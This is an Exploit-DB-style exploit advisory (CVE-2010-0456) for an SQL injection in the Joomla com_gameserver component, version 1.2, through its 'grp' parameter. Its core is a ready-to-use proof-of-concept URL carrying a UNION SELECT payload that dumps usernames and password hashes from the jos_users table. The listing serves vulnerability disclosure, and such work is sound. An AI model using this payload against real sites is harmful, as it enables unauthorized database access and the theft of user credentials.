ad

Joomla Component com_gameserver SQL Injection Vulnerability



EDB-ID: 11222 CVE: 2010-0456 OSVDB-ID: 62060
Author: B-HUNT3|2 Published: 2010-01-22 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability
# Date: 2010-01-22
# Author: B-Hunt3|2
# Software Link: http://joomlacode.org/gf/project/gameserver/frs/
# Version: 1.2
# CVE : N/A

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_gameserver) SQL Injection Vulnerability 
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: Demo Site

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var "grp" is vulnerable to SQL code injection.
[~]>> AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also. 
[~]>> RISK: High/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://server/component/gameserver/?view=gameserver&grp=[SQL]
[~]>> http://server/component/gameserver/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%23

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...